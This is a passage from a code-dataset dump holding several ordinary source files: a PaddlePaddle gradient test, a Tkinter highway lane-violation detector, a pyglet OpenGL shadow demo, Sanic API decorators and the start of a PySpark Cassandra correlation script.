= paddle.static.gradients([z], [x], [z_grad])\n exe = paddle.static.Executor()\n exe.run(sp)\n out = exe.run(\n program=mp,\n feed={\n 'primal0': primal0,\n 'index': index,\n 'v': v,\n },\n fetch_list=[res[0].name],\n )\n return out[0]\n\n dx = None\n ddx = None\n\n # fp16 is not supported for cpu gather\n if not (\n (self.count == 4)\n and isinstance(\n framework._current_expected_place(), framework.core.CPUPlace\n )\n ):\n dx = actual(self.primal0, self.index, self.axis, self.v)\n\n ddx = desired(self.primal0, self.index, self.axis, self.v)\n\n if (self.count >= 3) and isinstance(\n framework._current_expected_place(), framework.core.CPUPlace\n ):\n # Scatter in phi has problem with cpu kernel of case 4, so skip this\n pass\n elif (self.count == 4) and (\n not isinstance(\n framework._current_expected_place(), framework.core.CPUPlace\n )\n ):\n # FP16 test case\n np.testing.assert_allclose(\n actual=dx,\n desired=ddx,\n rtol=1e-3,\n atol=0,\n )\n elif self.count == 1:\n # FP64 test case\n np.testing.assert_allclose(\n actual=dx,\n desired=ddx,\n rtol=1e-15,\n atol=1e-15,\n )\n else:\n # FP32 test cases\n np.testing.assert_allclose(\n actual=dx,\n desired=ddx,\n rtol=1e-5,\n atol=0,\n )\n core._set_prim_backward_enabled(False)\n paddle.disable_static()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"PaddlePaddle/Paddle","sub_path":"test/prim/prim/vjp/static/test_comp_gather_grad.py","file_name":"test_comp_gather_grad.py","file_ext":"py","file_size_in_byte":6849,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"36476739496","text":"import time\nimport cv2\nimport sys\nimport numpy as np\nimport argparse\nimport os\nfrom utils import image_utils\nfrom utils import compare\nfrom utils.model_utils import vehicleDetector\nfrom sort import Sort\nfrom kalman_tracker import KalmanBoxTracker\nimport config\nfrom shapely.geometry.polygon import Polygon\n\nif \"Tkinter\" not in sys.modules:\n import tkinter as tk\n from tkinter import *\n from tkinter import messagebox\n from tkinter.filedialog import askopenfilename\n from tkinter.filedialog import askdirectory\nfrom PIL import ImageTk, Image\n\nIn = False\nVid_path = None\nOut_path = None\nldvar = False\nplayvar = False\nm_width = 1000\nm_height = 600\n\n# Function to set focus\ndef focus1(event): \n # set focus on the dur_field box \n dur_field.focus_set() \n \ndef focus2(event): \n # set focus on the std_field box \n std_field.focus_set()\n\ndef focus3(event): \n # set focus on the thresh_field box \n thresh_field.focus_set()\n\ndef input_path():\n global In\n global Vid_path\n In = True\n Vid_path = askopenfilename()\n print(Vid_path)\n \n\ndef output_path():\n global Out_path\n Out_path = askdirectory()\n # print(Out_path)\n\ndef playen():\n global playvar\n playvar = True\n\ndef loadmodel():\n global In\n global Vid_path\n global Out_path\n global vs\n global tracker\n global model \n global W\n global H\n global ldvar\n global result\n global ratio\n \n if In and thresh_field.get() != \"\" and dur_field.get() != \"\" and std_field.get() != \"\":\n \n inputFile = Vid_path\n vs = cv2.VideoCapture(inputFile)\n fps = int(vs.get(cv2.CAP_PROP_FPS))\n (W, H) = (int(vs.get(cv2.CAP_PROP_FRAME_WIDTH)), int(vs.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n\n print(\"Original FPS:\", fps)\n\n Tr = float(thresh_field.get())\n length = int(float(dur_field.get()) * fps)\n std = float(std_field.get())\n tracker = Sort(length= length, std = std)\n KalmanBoxTracker.count = 0\n print(varck.get())\n if varck.get():\n if Out_path == None:\n Out_path = Vid_path[:-4]+'_saved.avi'\n result = cv2.VideoWriter(Out_path, \n cv2.VideoWriter_fourcc(*'XVID'), \n fps, (W,H))\n\n model = vehicleDetector(r'model\\vehicle-detection-0202.xml', H, W, Tr)\n model.load()\n ldvar = True\n w_ratio = m_width/W\n h_ratio = m_height/H\n ratio = min(w_ratio,h_ratio)\n\n (grabbed, frame) = vs.read()\n if grabbed:\n frame1 = frame.copy()\n image_utils.draw_text(frame1, 'Draw dots on the right hand side line and press Enter', \n (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n config.right_pts, right_image = image_utils.get_points(frame,frame1,W,H)\n frame2 = right_image.copy()\n image_utils.draw_text(frame2, 'Draw dots on the middle line and press Enter', \n (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n config.middle_pts, middle_image = image_utils.get_points(right_image,frame2,W,H)\n frame3 = middle_image.copy()\n image_utils.draw_text(frame3, 'Draw dots on the left hand side line and press Enter', \n (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n config.left_pts, left_image = image_utils.get_points(middle_image,frame3,W,H)\n image_utils.draw_text(left_image, 'Drawing ground truths for lane is done. Press Enter to continue', \n (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n \n config.polygonR = Polygon(config.right_pts + config.middle_pts[: : -1])\n config.polygonL = Polygon(config.left_pts + config.middle_pts[: : -1])\n\n alpha = 0.15\n int_coords = lambda x: np.array(x).round().astype(np.int32)\n exteriorR = [int_coords(config.polygonR.exterior.coords)]\n exteriorL = [int_coords(config.polygonL.exterior.coords)]\n\n overlayR = left_image.copy()\n cv2.fillPoly(overlayR, exteriorR, color = (255, 81, 31))\n cv2.addWeighted(overlayR, alpha, left_image, 1 - alpha, 0, left_image)\n\n overlayL = left_image.copy()\n cv2.fillPoly(overlayL, exteriorL, color = (39, 237, 250))\n cv2.addWeighted(overlayL, alpha, left_image, 1 - alpha, 0, left_image)\n\n cv2.imshow(\"Image\", left_image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n \n else:\n messagebox.showerror(title=\"Message\", message=\"No video selected or parameters are not given\",icon='error')\n\ndef playvid():\n global In\n global Vid_path\n global Out_path\n global vs\n global tracker\n global model \n global W\n global H\n global ldvar\n global result\n global ldvar\n global playvar\n \n if ldvar and playvar:\n \n (grabbed, frame) = vs.read()\n if grabbed:\n \n t1 = time.time()\n detections = model.predict(frame)\n trackers = tracker.update(detections, frame)\n t2 = time.time()\n latency = t2 - t1\n posList = []\n\n for dt in trackers:\n dt = dt.astype(np.int32)\n posList.append(compare.compare_pos(dt,W,H))\n # print(posList)\n frame = image_utils.draw_lanes(frame,config.right_pts,config.middle_pts,config.left_pts,W,H)\n ill_lane_count = 0\n parkCount = 0\n for idx, d in enumerate(trackers):\n d = d.astype(np.int32)\n frame, status = image_utils.draw_box(frame, d, W, H, idx, posList)\n if status == 'park':\n parkCount += 1\n elif status == 'ill_lane':\n ill_lane_count += 1\n\n frame = image_utils.draw_info(frame, latency, parkCount, ill_lane_count)\n\n if varck.get():\n result.write(frame)\n resized = cv2.resize(frame,(int(W*ratio),int(H*ratio)))\n frame = cv2.cvtColor(resized,cv2.COLOR_BGR2RGB)\n img = Image.fromarray(frame)\n imgtk = ImageTk.PhotoImage(image=img)\n lvid.imgtk = imgtk\n lvid.configure(image=imgtk)\n \n else:\n playvar = False\n if varck.get():\n result.release()\n\n vs.release()\n else:\n lvid.configure(text='Choose a video and play')\n lvid.after(1, playvid)\n \n\ndef stopvid():\n global playvar\n playvar = False\n \n\ndef Quit():\n gui.destroy()\n \n\ngui = Tk() \nv1 = DoubleVar()\nvar1 = IntVar()\n\nvarck = IntVar()\n\ngui.configure(background=\"light green\") \ngui.title(\"Illegal Vehicle Parking Detection System\") \ngui.geometry(\"1300x710\")\n\nInput = Button(gui, text=\"Input DIR\", fg=\"Black\",\n command=input_path,height=2, width=19)\nInput.place(x=111, y=30,anchor='c')\nOutput = Button(gui, text=\"Output DIR\", fg=\"Black\", \n command=output_path,height=2, width=19) \nOutput.place(x=111, y=100,anchor='c')\n\n\n#setting up labels for the text entry boxes\nthresh_label = Label(gui, text=\"Detection Threshold\", bg=\"light green\",font=(\"Helvetica\", 12)) \nthresh_label.place(x=111, y=160,anchor='c')\ndur_label = Label(gui, text=\"Duration\", bg=\"light green\",font=(\"Helvetica\", 12))\ndur_label.place(x=70, y=240,anchor='c')\nstd_label = Label(gui, text=\"Standard Deviation\", bg=\"light green\",font=(\"Helvetica\", 12)) \nstd_label.place(x=108, y=320,anchor='c')\n\n#setting up text entry boxes\nthresh_field = Entry(gui,width = 23)\nthresh_field.place(x=111, y=200,anchor='c')\ndur_field = Entry(gui,width = 23) \ndur_field.place(x=111, y=280,anchor='c')\nstd_field = Entry(gui,width = 23)\nstd_field.place(x=111, y=360,anchor='c')\n\nthresh_field.bind(\"\", focus1) \ndur_field.bind(\"\", focus2)\nstd_field.bind(\"\", focus3) \n\nSave = Checkbutton(gui, text=\"Save Video\", variable=varck, \n bg='light green',font=(\"Helvetica\", 10))\nSave.place(x=111, y=404,anchor='c')\n\nLoad = Button(gui, text=\"Load\", fg=\"Black\",\n command=loadmodel,height=2, width=19)\nLoad.place(x=111, y=460,anchor='c')\n\nPlay = Button(gui, text=\"Play\", fg=\"Black\",\n command=playen,height=2, width=19)\nPlay.place(x=111, y=530,anchor='c')\nStop = Button(gui, text=\"Stop\", fg=\"Black\", \n command=stopvid,height=2, width=19) \nStop.place(x=111, y=600,anchor='c')\n\nQuit = Button(gui, text=\"Quit\", fg=\"Black\", \n bg = 'red',command=Quit,height=2, width=19) \nQuit.place(x=111, y=670,anchor='c')\n\nlvid = Label(gui)\nlvid.place(x=740, y=350,anchor='c')\nplayvid()\n\ngui.mainloop()\n\n\n","repo_name":"tharakarehan/highway-lane-violation-detector","sub_path":"run_sort.py","file_name":"run_sort.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"19137179896","text":"#!/usr/bin/env python\r\n# Demonstrates simple planar shadows\r\n# Ben Smith\r\n# benjamin.coder.smith@gmail.com\r\n#\r\n# based heavily on shadow.cpp\r\n# OpenGL SuperBible\r\n# Program by Richard S. Wright Jr.\r\n\r\nimport pyglet\r\nimport math\r\nfrom pyglet.gl import *\r\nfrom pyglet import window\r\nfrom pyglet.window import key\r\nimport sys\r\nsys.path.append(\"../shared\")\r\n\r\nfrom math3d import M3DVector3f, m3dFindNormal, M3DMatrix44f, m3dGetPlaneEquation, m3dMakePlanarShadowMatrix\r\nfrom fakeglut import glutSolidSphere\r\n\r\nxRot = 0.0\r\nyRot = 0.0\r\n\r\nlightArrayType = GLfloat * 4\r\nambientLight = lightArrayType(0.3, 0.3, 0.3, 1.0)\r\ndiffuseLight = lightArrayType(0.7, 0.7, 0.7, 1.0)\r\nspecular = lightArrayType(1.0, 1.0, 1.0, 1.0)\r\nlightPos = (GLfloat * 4)(-75.0, 150.0, -50.0, 0.0)\r\nspecref = (GLfloat * 4)(1.0, 1.0, 1.0, 1.0)\r\n\r\nshadowMat = M3DMatrix44f()\r\n\r\ndef DrawJet(nShadow):\r\n \r\n # Set material color, note we only have to set to black\r\n # for the shadow once\r\n if nShadow == 0:\r\n glColor3ub(128, 128, 128)\r\n else:\r\n glColor3ub(0,0,0)\r\n\r\n # Nose Cone - Points straight down\r\n # Set material color\r\n glBegin(GL_TRIANGLES)\r\n \r\n glNormal3f(0.0, -1.0, 0.0)\r\n glNormal3f(0.0, -1.0, 0.0)\r\n glVertex3f(0.0, 0.0, 60.0)\r\n glVertex3f(-15.0, 0.0, 30.0)\r\n glVertex3f(15.0,0.0,30.0)\r\n \r\n\r\n # Verticies for this panel\r\n vPoints = [ M3DVector3f(15.0, 0.0, 30.0),\r\n M3DVector3f(0.0, 15.0, 30.0),\r\n M3DVector3f(0.0, 0.0, 60.0)]\r\n \r\n # Calculate the normal for the plane\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(0.0, 0.0, 60.0),\r\n M3DVector3f(0.0, 15.0, 30.0),\r\n M3DVector3f(-15.0, 0.0, 30.0)]\r\n \r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n\r\n\r\n # Body of the Plane ############\r\n vPoints = [ M3DVector3f(-15.0, 0.0, 30.0),\r\n M3DVector3f(0.0, 15.0, 30.0),\r\n M3DVector3f(0.0, 0.0, -56.0)]\r\n \r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(0.0, 0.0, -56.0),\r\n M3DVector3f(0.0, 15.0, 30.0),\r\n M3DVector3f(15.0, 0.0, 30.0)]\r\n \r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n glNormal3f(0.0, -1.0, 0.0)\r\n glVertex3f(15.0,0.0,30.0)\r\n glVertex3f(-15.0, 0.0, 30.0)\r\n glVertex3f(0.0, 0.0, -56.0)\r\n\r\n #######################\r\n # Left wing\r\n # Large triangle for bottom of wing\r\n \r\n vPoints = [ M3DVector3f(0.0, 2.0, 27.0),\r\n M3DVector3f(-60.0, 2.0, -8.0),\r\n M3DVector3f(60, 2.0, -8.0)]\r\n \r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(60.0, 2.0, -8.0),\r\n M3DVector3f(0.0, 7.0, -8.0),\r\n M3DVector3f(0.0, 2.0, 27.0)]\r\n \r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(60.0, 2.0, -8.0),\r\n M3DVector3f(-60.0, 2.0, -8.0),\r\n M3DVector3f(0.0, 7.0, -8.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(0.0, 2.0, 27.0),\r\n M3DVector3f(0.0, 7.0, -8.0),\r\n M3DVector3f(-60.0, 2.0, -8.0)]\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n \r\n \r\n # Tail section###############\r\n # Bottom of back fin\r\n glNormal3f(0.0, -1.0, 0.0)\r\n glVertex3f(-30.0, -0.50, -57.0)\r\n glVertex3f(30.0, -0.50, -57.0)\r\n glVertex3f(0.0,-0.50,-40.0)\r\n\r\n vPoints = [ M3DVector3f(0.0, -0.5, -40.0),\r\n M3DVector3f(30.0, -0.5, -57.0),\r\n M3DVector3f(0.0, 4.0, -57.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(0.0, 4.0, -57.0),\r\n M3DVector3f(-30.0, -0.5, -57.0),\r\n M3DVector3f(0.0, -0.5, -40.0)]\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(30.0, -0.5, -57.0),\r\n M3DVector3f(-30.0, -0.5, -57.0),\r\n M3DVector3f(0.0, 4.0, -57.0)]\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n\r\n vPoints = [ M3DVector3f(0.0, 0.5, -40.0),\r\n M3DVector3f(3.0, 0.5, -57.0),\r\n M3DVector3f(0.0, 25.0, -65.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n \r\n vPoints = [ M3DVector3f(0.0, 25.0, -65.0),\r\n M3DVector3f(-3.0, 0.5, -57.0),\r\n M3DVector3f(0.0, 0.5, -40.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(3.0, 0.5, -57.0),\r\n M3DVector3f(-3.0, 0.5, -57.0),\r\n M3DVector3f(0.0, 25.0, -65.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n\r\n\r\n glEnd()\r\n\r\nclass MainWindow(window.Window):\r\n def __init__(self, *args, **kwargs):\r\n global shadowMat\r\n window.Window.__init__(self, *args, **kwargs)\r\n\r\n # Any three points on the ground (counter clockwise order)\r\n points = [ M3DVector3f(-30.0, -149.0, -20.0),\r\n M3DVector3f(-30.0, -149.0, 20.0),\r\n M3DVector3f(40.0, -149.0, 20.0) ]\r\n\r\n glEnable(GL_DEPTH_TEST)\r\n glEnable(GL_CULL_FACE)\t\t# Do not calculate inside of jet\r\n glFrontFace(GL_CCW)\t\t# Counter clock-wise polygons face out\r\n\r\n # Enable Lighting\r\n glEnable(GL_LIGHTING)\r\n \r\n # Setup and enable light 0\r\n glLightfv(GL_LIGHT0, GL_AMBIENT, ambientLight)\r\n glLightfv(GL_LIGHT0, GL_DIFFUSE, diffuseLight)\r\n glLightfv(GL_LIGHT0, GL_SPECULAR, specular)\r\n glLightfv(GL_LIGHT0,GL_POSITION,lightPos)\r\n glEnable(GL_LIGHT0)\r\n \r\n # Enable color tracking\r\n glEnable(GL_COLOR_MATERIAL)\r\n \r\n # Set Material properties to follow glColor values\r\n glColorMaterial(GL_FRONT, GL_AMBIENT_AND_DIFFUSE)\r\n\r\n # All materials hereafter have full specular reflectivity\r\n # with a high shine\r\n glMaterialfv(GL_FRONT, GL_SPECULAR, specref)\r\n glMateriali(GL_FRONT, GL_SHININESS, 128)\r\n\r\n # light blue background\r\n glClearColor(0.0, 0.0, 1.0, 1.0)\r\n \r\n # Get the plane equation from three points on the ground\r\n\r\n vPlaneEquation = m3dGetPlaneEquation(points[0], points[1], points[2])\r\n\r\n # Calculate projection matrix to draw shadow on the ground\r\n shadowMat = m3dMakePlanarShadowMatrix(vPlaneEquation, lightPos)\r\n glEnable(GL_NORMALIZE)\r\n \r\n # Called to draw scene\r\n def on_draw(self):\r\n # Clear the window with current clearing color\r\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\r\n\r\n # Draw the ground, we do manual shading to a darker green\r\n # in the background to give the illusion of depth\r\n glBegin(GL_QUADS)\r\n \r\n glColor3ub(0,32,0)\r\n glVertex3f(400.0, -150.0, -200.0)\r\n glVertex3f(-400.0, -150.0, -200.0)\r\n glColor3ub(0,255,0)\r\n glVertex3f(-400.0, -150.0, 200.0)\r\n glVertex3f(400.0, -150.0, 200.0)\r\n \r\n glEnd()\r\n\r\n # Save the matrix state and do the rotations\r\n glPushMatrix()\r\n\r\n # Draw jet at new orientation, put light in correct position\r\n # before rotating the jet\r\n glEnable(GL_LIGHTING)\r\n glLightfv(GL_LIGHT0,GL_POSITION,lightPos)\r\n glRotatef(xRot, 1.0, 0.0, 0.0)\r\n glRotatef(yRot, 0.0, 1.0, 0.0)\r\n\r\n DrawJet(0)\r\n\r\n # Restore original matrix state\r\n glPopMatrix()\r\n\r\n\r\n # Get ready to draw the shadow and the ground\r\n # First disable lighting and save the projection state\r\n glDisable(GL_DEPTH_TEST)\r\n glDisable(GL_LIGHTING)\r\n glPushMatrix()\r\n\r\n # Multiply by shadow projection matrix\r\n glMultMatrixf(shadowMat)\r\n\r\n # Now rotate the jet around in the new flattend space\r\n glRotatef(xRot, 1.0, 0.0, 0.0)\r\n glRotatef(yRot, 0.0, 1.0, 0.0)\r\n\r\n # Pass true to indicate drawing shadow\r\n DrawJet(1)\r\n\r\n # Restore the projection to normal\r\n glPopMatrix()\r\n\r\n # Draw the light source\r\n glPushMatrix()\r\n glTranslatef(lightPos[0],lightPos[1], lightPos[2])\r\n glColor3ub(255,255,0)\r\n glutSolidSphere(5.0,10,10)\r\n glPopMatrix()\r\n\r\n # Restore lighting state variables\r\n glEnable(GL_DEPTH_TEST)\r\n\r\n def on_resize(self, w, h):\r\n # Prevent a divide by zero\r\n if(h == 0):\r\n h = 1\r\n \r\n # Set Viewport to window dimensions\r\n glViewport(0, 0, w, h)\r\n\r\n # Reset coordinate system\r\n glMatrixMode(GL_PROJECTION)\r\n glLoadIdentity()\r\n\r\n # Produce the perspective projection\r\n fAspect = float(w)/float(h)\r\n gluPerspective(60.0, fAspect, 200.0, 500.0)\r\n \r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n \r\n # Move out Z axis so we can see everything\r\n glTranslatef(0.0, 0.0, -400.0)\r\n glLightfv(GL_LIGHT0, GL_POSITION, lightPos)\r\n\r\n def on_key_press(self, symbol, modifier):\r\n global xRot, yRot\r\n if symbol == key.UP:\r\n xRot -= 5.0\r\n elif symbol == key.DOWN:\r\n xRot += 5.0\r\n elif symbol == key.LEFT:\r\n yRot -= 5.0\r\n elif symbol == key.RIGHT:\r\n yRot += 5.0\r\n \r\n xRot = float(int(xRot) % 360)\r\n yRot = float(int(yRot) % 360)\r\n\r\n# Main program entry point\r\nif __name__ == '__main__':\r\n w = MainWindow(800, 600, caption='Shadow', resizable=True)\r\n pyglet.app.run()\r\n","repo_name":"BenSmith/PythonOpenGLSuperBible4","sub_path":"chapt05/shadow.py","file_name":"shadow.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"29"} +{"seq_id":"38905763935","text":"import inspect\nfrom functools import wraps\nfrom typing import Callable, Type, TypeVar, Generic, Dict, Optional, Union\n\nfrom sanic.response import HTTPResponse\n\nfrom sanic_ext.exceptions import InitError\nfrom sanic_ext.extensions.openapi.builders import OperationStore\nfrom sanic_ext.utils.extraction import extract_request\n\nfrom pydantic import BaseModel, ValidationError, Field, SerializeAsAny\n\nfrom grpc.aio import AioRpcError\nfrom grpc import StatusCode\n\nfrom api.utils.tools import component\nfrom utils.Exceptions import _321CQUException\n\n__all__ = ['api_request', 'api_response', 'handle_grpc_error']\n\nT = TypeVar(\"T\", bound=BaseModel)\n\n\nclass BaseApiResponse(BaseModel, Generic[T]):\n \"\"\"\n API响应模版,回传的ApiResponse子类会填入data中\n \"\"\"\n status: int = Field(title='响应状态', description='成功时为1,失败时为0')\n msg: str = Field(title='响应信息', description='成功时为`success`,失败时为相关错误提示')\n data: SerializeAsAny[T | dict] = Field(title=\"数据\")\n\n\ndef api_request(\n json: Type[BaseModel] | None = None,\n form: Type[BaseModel] | None = None,\n query: Type[BaseModel] | None = None,\n body_argument: str = \"body\",\n query_argument: str = \"query\",\n **kwargs\n) -> Callable:\n \"\"\"\n 实现请求参数校验即OpenAPI文档生成的装饰器\n\n **json和form不能同时被设置**\n\n :param json: 请求体以json格式读取后应当对应的数据模型\n :param form: 请求体以form格式读取后应当对应的数据模型\n :param query: 路由查询参数读取后应对应的数据模型\n :param body_argument: 请求体中参数应当注入的名字,默认为\"body\"\n :param query_argument: 路由查询参数应当注入的名字,默认为\"body\"\n :param kwargs: 其他需要显示在/docs中的参数(需满足OpenAPI规范)\n \"\"\"\n\n if json and form:\n raise InitError(\"Cannot define both a form and json route validator\")\n\n def decorator(f):\n title = json.model_config.get(\"title\") if json is not None else \\\n (form.model_config.get(\"title\") if form is not None else None)\n body_content = {\n \"application/json\": component(json)\n } if json is not None else (\n {\n \"application/x-www-form-urlencoded\": component(form)\n } if form is not None else None\n )\n params = {**kwargs}\n\n @wraps(f)\n async def decorated_function(*args, **kwargs):\n request = extract_request(*args)\n try:\n if json:\n kwargs[body_argument] = json.model_validate(request.json)\n elif form:\n kwargs[body_argument] = form.model_validate(request.form)\n if query:\n parsed_args = {}\n for key, value in request.args.items():\n parsed_args[key] = value[0] if len(value) == 1 else value\n kwargs[query_argument] = query.model_validate(parsed_args)\n except ValidationError as e:\n raise _321CQUException(error_info=f\"请求参数错误\", quite=True)\n retval = f(*args, **kwargs)\n if inspect.isawaitable(retval):\n retval = await retval\n return retval\n\n # 使用sanic-ext中的OperationStore实现文档自动生成,参考其中的openapi.body装饰器\n if f in OperationStore():\n OperationStore()[decorated_function] = OperationStore().pop(f)\n if body_content is not None:\n OperationStore()[decorated_function].body(body_content, **params)\n if query is not None:\n schema = query.model_json_schema(ref_template=\"#/components/schemas/{model}\")\n for name, value in inspect.get_annotations(query).items():\n ex_param = {}\n if schema.get('properties') is not None and schema['properties'].get(name) is not None:\n ex_param = schema['properties'][name]\n\n description = (ex_param.get('title') if ex_param.get('title') else '') + (\n ex_param.get('description') if ex_param.get('description') else '')\n if description == '':\n description = None\n\n OperationStore()[decorated_function].parameter(name, value, 'query', description=description)\n return decorated_function\n\n return decorator\n\n\ndef api_response(retval: Optional[Union[Type[BaseModel], Dict, HTTPResponse]] = None, status: int = 200,\n description: str = '',\n *, auto_wrap: bool = True, **kwargs):\n \"\"\"\n 实现参数返回值自动包装与API页面生成的装饰器\n :param retval: 返回值信息,可以为ApiResponse的子类或字典,为空则返回值中data项置None\n :param status: Response Http相应码\n :param description: 返回值相关描述,显示在/docs页面中\n :param auto_wrap: 强制关键字参数,为False时直接返回被装饰函数运行结果\n :param kwargs: 其他需要显示在/docs中的参数(需满足OpenAPI规范)\n \"\"\"\n\n def decorator(f):\n @wraps(f)\n async def decorated_function(*args, **kwargs):\n ret = f(*args, **kwargs)\n if inspect.isawaitable(ret):\n ret = await ret\n\n kwargs[\"status\"] = status\n if auto_wrap:\n return HTTPResponse(\n BaseApiResponse[(retval if retval is not None else Dict)](\n status=1, msg='success', data=(ret if ret is not None else {})\n ).model_dump_json(),\n content_type=\"application/json\")\n else:\n return ret\n\n # 使用sanic-ext中的OperationStore实现文档自动生成,参考其中的openapi.body装饰器\n if f in OperationStore():\n OperationStore()[decorated_function] = OperationStore().pop(f)\n\n if auto_wrap:\n if inspect.isclass(retval) and issubclass(retval, BaseModel):\n OperationStore()[decorated_function].response(\n status, {\n 'application/json': component(BaseApiResponse[retval])\n },\n description, **kwargs\n )\n else:\n base_retval = {'status': 1, 'msg': 'success', 'data': retval}\n OperationStore()[decorated_function].response(\n status, {'application/json': component(BaseApiResponse[Dict])}, description, **kwargs)\n else:\n OperationStore()[decorated_function].response(status, retval, description, **kwargs)\n return decorated_function\n\n return decorator\n\n\ndef handle_grpc_error(func):\n \"\"\"\n 处理AioRpcError,返回的HttpResponse中包含503与grpc报错详细信息\n \"\"\"\n\n @wraps(func)\n async def wrapped_function(*args, **kwargs):\n try:\n ret = func(*args, **kwargs)\n if inspect.isawaitable(ret):\n ret = await ret\n return ret\n except AioRpcError as e:\n if e.code() == StatusCode.UNAVAILABLE:\n raise _321CQUException(error_info=e.details() if e.details() is not None else \"服务调用异���\",\n extra=e.details(), status_code=503, quite=False)\n elif e.code() == StatusCode.INVALID_ARGUMENT:\n raise _321CQUException(error_info=e.details() if e.details() is not None else \"服务调用异常\",\n extra=e.details(), status_code=503, quite=True)\n raise _321CQUException(error_info=\"服务调用异常\", extra=e.details(), status_code=503, quite=False)\n\n return wrapped_function\n","repo_name":"ZhuLegend/321CQU_APIGateway","sub_path":"api/utils/ApiInterface.py","file_name":"ApiInterface.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29998173165","text":"from pyspark import SparkConf, SparkContext\nimport sys,re\nfrom uuid import UUID,uuid4\nfrom pyspark.sql import SparkSession,functions as fu, Row, types\nassert sys.version_info >= (3, 5)\n\ndef corr_coeff(corr):\n num = (corr['sum(for_n)']*corr['sum(x*y)']) - (corr['sum(x)']*corr['sum(y)'])\n den_1 = fu.sqrt((corr['sum(for_n)']*corr['sum(x^2)']) - (corr['sum(x)']**2))\n den_2 = fu.sqrt((corr['sum(for_n)']*corr['sum(y^2)']) - (corr['sum(y)']**2))\n r = num / (den_1*den_2)\n return r\n\ndef main(keyspace,table):\n cluster_seeds = ['199.60.17.188', '199.60.17.216']\n spark = SparkSession.builder.appName('Spark Cassandra example').config('spark.cassandra.connection.host', ','.join(cluster_seeds)).getOrCreate()\n df = spark.read.format(\"org.apache.spark.sql.cassandra\").options(table=table, keyspace=keyspace).load()\n log_corr = df.select('host','bytes')\n x_y = 